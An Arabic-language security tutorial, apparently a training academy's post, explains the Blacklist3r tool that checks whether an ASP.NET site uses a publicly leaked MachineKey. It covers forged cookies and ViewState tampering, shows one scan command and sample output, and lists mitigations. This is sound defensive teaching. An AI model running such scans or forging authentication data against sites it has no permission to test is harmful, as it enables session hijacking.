🛡 ما هي اداة Blacklist3r وما هي المشكلة الأساسية التي تحلها ؟ 🌎.. ✅ تخيل أن لديك منزلًا (موقع ويب) ومفتاح هذا المنزل (MachineKey) منشور على الإنترنت ويمكن لأي شخص رؤيته، فوجود المفتاح متاح للعموم يجعل المنزل غير آمن. ✅ هذا بالضبط ما تفعله Blacklist3r: تكتشف ما إذا كان "مفتاح المنزل" الخاص بموقع ASP.NET (الـ MachineKey) منشورًا ومعلومًا للجميع. 🔐 ما هو الـ MachineKey ولماذا هو مهم جدًا؟ في عالم تطبيقات ASP.NET، الـ MachineKey هو بمثابة بصمة الأمان السرية للتطبيق، وظيفته: 1️⃣ يوقّع بيانات المستخدم (Cookies): عندما يسجل مستخدم دخوله، ينشئ السيرفر "كوكي" يحتوي على بيانات هويته، الـ MachineKey يوقّع هذا الكوكي بتوقيع رقمي، عندما يعود المستخدم، يتحقق السيرفر من هذا التوقيع ليتأكد أن الكوكي لم يتم العبث به. 2️⃣ يحمي حالة الصفحة (ViewState): يحفظ حالة عناصر الصفحة (مثل محتويات خانة نصية) بين طلبات الـ Postback، الـ MachineKey يضمن أن هذه البيانات لم يتم العبث بها من قبل المستخدم. 💥 الخلاصة: إذا عرف المهاجم الـ MachineKey، يستطيع: 📌 تزوير هويات المستخدمين: إنشاء كوكي بتوقيع صالح لأي مستخدم (مثل Administrator) والدخول إلى حسابات الآخرين. 📌 التلاعب ببيانات الصفحة (ViewState): تعديل البيانات المرسلة من المتصفح إلى السيرفر لتنفيذ هجمات. 🔍 كيف تعمل Blacklist3r بالتفصيل؟ ⚠️ الأداة لا "تخترق"، بل "تختبر" أو "تتحقق" من قوة الأمان. 1️⃣ بناء قاعدة بيانات: تمتلك الأداة قائمة ضخمة (Blacklist) من مفاتيح MachineKey التي تم تسريبها ونشرها علنًا على منصات مثل GitHub، أو في قوالب مشاريع جاهزة، أو في شفرات مصدرية قديمة. 2️⃣ إرسال طلبات اختبار: تقوم الأداة بزيارة الموقع المستهدف وترسل له طلبات تحتوي على بيانات (مثل كوكي أو ViewState) مُوقَّعة باستخدام كل مفتاح من مفاتيح القائمة السوداء. 3️⃣ تحليل الاستجابة: تستمع الأداة لرد السيرفر. 🟢 إذا رفض السيرفر جميع الطلبات: هذا يعني أن المفتاح الحقيقي للموقع غير موجود في القائمة السوداء، والموقع آمن من هذه الثغرة. ⏺ إذا قبل السيرفر أحد هذه الطلبات: هذا يعني أن المفتاح الذي استُخدم لتوقيع هذا الطلب مطابق للمفتاح السري الحقيقي للموقع. وبالتالي، تم اكتشاف أن الموقع يستخدم مفتاحًا معروفًا ومنشورًا. 🔓 مثال ثغرة machineKey في ASP.NET: ⏺ الخطأ: قام المطور بوضع مفاتيح machineKey معروفة علنًا داخل ملف web.config (مثل المفاتيح التجريبية التي تبدأ بـ A1234567890...). ⏺ الكشف: استخدام أداة متخصصة (مثل Blacklist3r) لفحص التطبيق. AspDotNetWrapper.exe --url http://localhost:5500/ ⏺ النتيجة: تكتشف الأداة المفتاح المكشوف وتصدر تحذيراً: [WARNING] Found a matching Machine Key! [INFO] The site is using a known, publicly exposed key. ⏺ الخطر: هذا يتيح للمهاجمين تزوير بيانات View State أو ملفات تعريف المصادقة، مما يؤدي إلى اختراق الجلسة. ⏺ الحل: يجب توليد مفاتيح عشوائية وفريدة لكل تطبيق. 🛡 الإجراءات الوقائية: 1️⃣ تغيير مفتاح الآلة (Machine Key) فورًا: احذف قسم machineKey من ملف web.config لإنشاء مفتاح عشوائي آليًا، أو استخدم أداة لتوليد مفتاح جديد وقوي. 2️⃣ تفعيل إعدادات الأمان في web.config: 📌 تأكد من تفعيل enableViewStateMac="true" (لحماية حالة العرض). 📌 ضبط requestValidationMode="2.0" (للتحقق من صحة المدخلات). 3️⃣ حماية الملفات الحساسة: منع رفع ملفات مثل web.config إلى منصات مثل GitHub باستخدام .gitignore. 4️⃣ استخدام خدمات آمنة لإدارة الأسرار: تجنب تخزين المفاتيح في web.config. استبدلها بخدمات مثل Azure Key Vault أو متغيرات بيئة النظام. ✅ اداة Blacklist3r هي منظار أمني وليست سلاحًا، وظيفتها هي: ⏺ للمختبرين: كشف الثغرات وإبلاغ أصحاب المنصات بها. ⏺ لمسؤولي الأنظمة: القيام بفحوصات دورية للتأكد من أن تطبيقاتهم لا تستخدم مفاتيح مسربة. ⏺ للمطورين: تذكيرهم بخطورة تسريب المفاتيح في الشفرات المصدرية. الاستخدام الصحيح لها يؤدي إلى رفع مستوى الأمان وحماية المستخدمين والبيانات، وهو الهدف النبيل للأمن السيبراني. 📝 هذا تقرير كامل يشرح اداة Blacklist3r بالغة العربية | English Language 📝 ‏🎓 بإمكانك التسجيل والاشتراك في الدورات الإحترافية على أكاديمية الدرع الأخضر هنــــــا ‏🎓
0